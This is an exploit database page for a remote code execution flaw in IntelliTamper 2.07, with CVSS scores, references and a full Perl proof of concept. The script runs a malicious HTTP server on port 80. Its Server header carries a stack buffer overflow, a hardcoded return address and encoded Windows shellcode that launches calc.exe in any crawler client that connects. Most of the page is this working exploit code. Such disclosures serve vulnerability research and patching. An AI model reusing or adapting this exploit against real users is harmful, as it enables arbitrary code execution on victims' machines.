IntelliTamper 2.07 (server header) Remote Code Execution Exploit

2008.07.31
Credit: Koshi
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl # # IntelliTamper 2.07 Remote Code Execution ( server header ) # # By: Koshi # # Guido Landi finally did it, thought i'd throw one in there. # This example assumes you're scanning "http://127.0.0.1" # For example, exploit may not work if you were to scan "http://127.0.0.1:80" # or even changing it as slightly as "http://127.0.0.1/" # # gr33tz: Rima my baby, str0ke, messiah, Idol, old venny ;) , BU, # and finally, Guido Landi for sparking my interest in exploiting # this application. # # use IO::Socket; my $msg=""; my $overflow = "A"x1536; my $fun = "". "\xb3\x8d\x95\x7c". # EIP (0x7C958DB3 call esp NTDLL.DLL) "z3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0C". # More buffer. "AAAA2Cb3Cb4CBBBB"; # Starts executing here # win32_exec - EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com my $sh3llcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x63". "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\x32\x41\x41\x32". "\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x4b\x59\x59\x6c\x6a". "\x48\x70\x44\x35\x50\x65\x50\x73\x30\x6e\x6b\x33\x75\x75\x6c\x4c". "\x4b\x71\x6c\x53\x35\x74\x38\x55\x51\x78\x6f\x6e\x6b\x62\x6f\x36". "\x78\x6c\x4b\x53\x6f\x65\x70\x36\x61\x6a\x4b\x43\x79\x6e\x6b\x76". "\x54\x4e\x6b\x53\x31\x68\x6e\x64\x71\x6f\x30\x5a\x39\x4e\x4c\x6e". "\x64\x6f\x30\x71\x64\x75\x57\x78\x41\x38\x4a\x74\x4d\x76\x61\x4f". "\x32\x5a\x4b\x39\x64\x75\x6b\x43\x64\x67\x54\x74\x44\x74\x35\x48". "\x65\x6c\x4b\x73\x6f\x37\x54\x57\x71\x38\x6b\x70\x66\x6e\x6b\x64". "\x4c\x70\x4b\x4e\x6b\x33\x6f\x35\x4c\x64\x41\x38\x6b\x4c\x4b\x37". "\x6c\x4c\x4b\x76\x61\x58\x6b\x6c\x49\x43\x6c\x55\x74\x56\x64\x4f". "\x33\x44\x71\x4f\x30\x30\x64\x6c\x4b\x77\x30\x74\x70\x6f\x75\x49". "\x50\x50\x78\x36\x6c\x4c\x4b\x33\x70\x54\x4c\x6e\x6b\x30\x70\x45". "\x4c\x6e\x4d\x4c\x4b\x55\x38\x43\x38\x78\x6b\x44\x49\x6e\x6b\x4b". "\x30\x6c\x70\x45\x50\x65\x50\x75\x50\x4c\x4b\x41\x78\x75\x6c\x51". "\x4f\x30\x31\x7a\x56\x51\x70\x30\x56\x4f\x79\x38\x78\x6c\x43\x6b". "\x70\x71\x6b\x72\x70\x61\x78\x4a\x50\x4d\x5a\x43\x34\x43\x6f\x43". "\x58\x4c\x58\x49\x6e\x6c\x4a\x66\x6e\x43\x67\x69\x6f\x48\x67\x43". "\x53\x73\x51\x50\x6c\x41\x73\x66\x4e\x70\x65\x72\x58\x71\x75\x37". "\x70\x63"; my $overflow2 = "A"x1046; my $buff = "$overflow$fun$sh3llcode"; my $resp = "". "HTTP/1.1 200 OK\r\n". "Connection: close\r\n". "Content-Length: 8\r\n". "Date: Mon, 21 Jul 2008 20:47:05 GMT\r\n". "Content-Type: text/plain\r\n". "Server: $buff\r\n". "MIME-Version: 1.0\r\n\r\n". "Exploit!\r\n"; my $sock = new IO::Socket::INET (LocalPort => '80', Proto => 'tcp', Listen => 1, Reuse => 1, ); print "Listening on port 80 for connections...\n"; my $new_sock = $sock->accept(); print "Got connection from client...\n"; my $sock_addr = recv($new_sock,$msg,190,0); print "Sending client packet...\n"; print $new_sock "$resp"; print "Packet sent to client, voila?\n"; close($sock); print "Socket closed\n";

References:

http://www.securityfocus.com/bid/30356
http://www.milw0rm.com/exploits/6118


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top